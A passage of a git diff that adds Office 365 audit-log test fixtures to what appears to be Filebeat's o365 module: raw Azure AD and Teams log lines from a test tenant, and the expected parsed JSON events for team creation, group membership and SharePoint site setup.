Deleted","NewValue":"False","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"3e7b36e7-caba-4d7a-ae08-07f0a716135c","IntraSystemId":"995e2026-17cc-4599-8f63-b3f3556d784b","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} +{"CreationTime":"2021-02-04T16:33:14","Id":"4a27de4c-a2dd-4825-8f7f-6a623b3060ec","Operation":"Change user license.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"443c61f9-900a-46cd-906f-7de2d16bd7b0","IntraSystemId":"74634e79-78c4-4335-8776-8afc267f5329","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} +{"CreationTime":"2021-02-05T09:05:59","Id":"eed8f929-567c-45bf-94ad-76ccf0f26300","Operation":"UserLoginFailed","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"00000002-0000-0000-c000-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"UserAuthenticationMethod","Value":"1"},{"Name":"RequestType","Value":"Login:login"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"9b4acea8-44ad-49f1-a9c3-88c075e8ba85","IntraSystemId":"eed8f929-567c-45bf-94ad-76ccf0f26300","SupportTicketId":"","Target":[{"ID":"00000002-0000-0000-c000-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"4345a7b9-9a63-4910-a426-35363201d503","ErrorNumber":"50072","LogonError":"UserStrongAuthEnrollmentRequiredInterrupt"} +{"CreationTime":"2021-02-05T09:05:59","Id":"eed8f929-567c-45bf-94ad-76ccf0f26300","Operation":"UserLoginFailed","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"00000002-0000-0000-c000-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"UserAuthenticationMethod","Value":"1"},{"Name":"RequestType","Value":"Login:login"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"9b4acea8-44ad-49f1-a9c3-88c075e8ba85","IntraSystemId":"eed8f929-567c-45bf-94ad-76ccf0f26300","SupportTicketId":"","Target":[{"ID":"00000002-0000-0000-c000-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"4345a7b9-9a63-4910-a426-35363201d503","ErrorNumber":"50072","LogonError":"UserStrongAuthEnrollmentRequiredInterrupt"} +{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"} diff --git a/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json new file mode 100644 index 000000000000..372b29d8c2ca --- /dev/null +++ b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json @@ -0,0 +1,3456 @@ +[ + { + "@timestamp": "2021-02-05T09:08:00.000Z", + "event.action": "added-group-account-to", + "event.category": "iam", + "event.code": "MicrosoftTeams", + "event.dataset": "o365.audit", + "event.id": "9b9e973b-64c3-4607-bc79-bf743c985051", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "MicrosoftTeams", + "event.type": [ + "group", + "creation" + ], + "fileset.name": "audit", + "group.name": "users", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 0, + "o365.audit.CreationTime": "2021-02-05T09:08:00", + "o365.audit.Id": "9b9e973b-64c3-4607-bc79-bf743c985051", + "o365.audit.Operation": "TeamCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 25, + "o365.audit.TeamGuid": "19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2", + "o365.audit.TeamName": "users", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 2, + "o365.audit.Version": 1, + "o365.audit.Workload": "MicrosoftTeams", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "root", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root" + }, + { + "@timestamp": "2021-02-05T09:07:58.000Z", + "event.action": "added-users-to-group", + "event.category": "iam", + "event.code": "MicrosoftTeams", + "event.dataset": "o365.audit", + "event.id": "f16cc0cc-2a18-580e-83c5-04d3c385ebb8", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "MicrosoftTeams", + "event.type": [ + "group", + "change" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 406, + "o365.audit.AADGroupId": "61b6d6f5-7aa0-437b-a967-fbcd39ec90a1", + "o365.audit.CommunicationType": "Team", + "o365.audit.CreationTime": "2021-02-05T09:07:58", + "o365.audit.Id": "f16cc0cc-2a18-580e-83c5-04d3c385ebb8", + "o365.audit.ItemName": "users", + "o365.audit.Members": [ + { + "DisplayName": "Adrian Serrano", + "Role": 2, + "UPN": "admin@testsiem4.onmicrosoft.com" + }, + { + "DisplayName": "Eve", + "Role": 2, + "UPN": "eve@testsiem4.onmicrosoft.com" + } + ], + "o365.audit.Operation": "MemberAdded", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 25, + "o365.audit.TeamGuid": "19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2", + "o365.audit.TeamName": "users", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "MicrosoftTeams", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": [ + "admin@testsiem4.onmicrosoft.com", + "eve@testsiem4.onmicrosoft.com", + "root" + ], + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root" + }, + { + "@timestamp": "2021-02-05T09:08:13.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "6454a7d9-afae-4a6c-ffa5-08d8c9b5911c", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 1073, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-5054-2000-9ced-83aa1cf560fd", + "o365.audit.CreationTime": "2021-02-05T09:08:13", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "6454a7d9-afae-4a6c-ffa5-08d8c9b5911c", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:08:12.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "FolderCreated", + "event.category": "file", + "event.code": "SharePointFileOperation", + "event.dataset": "o365.audit", + "event.id": "6d69552c-2019-4f7c-92bc-08d8c9b5908b", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "creation", + "file.directory": "Shared Documents", + "file.extension": "", + "file.name": "General", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 2192, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-b01b-2000-9ced-879789d2d8e5", + "o365.audit.CreationTime": "2021-02-05T09:08:12", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "6d69552c-2019-4f7c-92bc-08d8c9b5908b", + "o365.audit.ItemType": "Folder", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListItemUniqueId": "81d4cd08-7ffb-45d2-a422-86a9a9335d66", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/Shared Documents/General", + "o365.audit.Operation": "FolderCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 6, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users/", + "o365.audit.SourceFileExtension": "", + "o365.audit.SourceFileName": "General", + "o365.audit.SourceRelativeUrl": "Shared Documents", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "url.original": "https://testsiem4.sharepoint.com/sites/users/Shared Documents/General", + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:07:57.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "6e9fc7e0-158a-4456-2a89-08d8c9b58771", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 3234, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:57", + "o365.audit.EventData": "Site Members", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "6e9fc7e0-158a-4456-2a89-08d8c9b58771", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "Everyone except external users", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "a9b8277d-d3b9-4d99-0491-08d8c9b5874b", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 4046, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "a9b8277d-d3b9-4d99-0491-08d8c9b5874b", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "SHAREPOINT\\system", + "o365.audit.TargetUserOrGroupType": "Member", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "dfef0880-e895-47e1-2e39-08d8c9b58733", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 4838, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "dfef0880-e895-47e1-2e39-08d8c9b58733", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "users Owners", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "d9b6f410-30c7-42a0-0820-08d8c9b5872c", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 5631, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Members", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "d9b6f410-30c7-42a0-0820-08d8c9b5872c", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "users Members", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "5c82c14e-525e-44f4-7cd7-08d8c9b58722", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 6426, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "5c82c14e-525e-44f4-7cd7-08d8c9b58722", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "SHAREPOINT\\system", + "o365.audit.TargetUserOrGroupType": "Member", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "client.address": "20.190.143.50", + "client.ip": "20.190.143.50", + "event.action": "SiteCollectionCreated", + "event.category": "web", + "event.code": "SharePoint", + "event.dataset": "o365.audit", + "event.id": "f576a30e-1734-4f42-f3b3-08d8c9b58718", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 7218, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Graph", + "o365.audit.ApplicationId": "00000006-0000-0ff1-ce00-000000000000", + "o365.audit.ClientIP": "20.190.143.50", + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "O365AdminCenterTrueFalse", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "f576a30e-1734-4f42-f3b3-08d8c9b58718", + "o365.audit.ItemType": "Site", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "SiteCollectionCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 4, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "20.190.143.50", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "20.190.143.50", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "f84f38b0-1963-4a1d-454e-08d8c9b586e9", + "event.kind": "event", + "event.module": "o365", 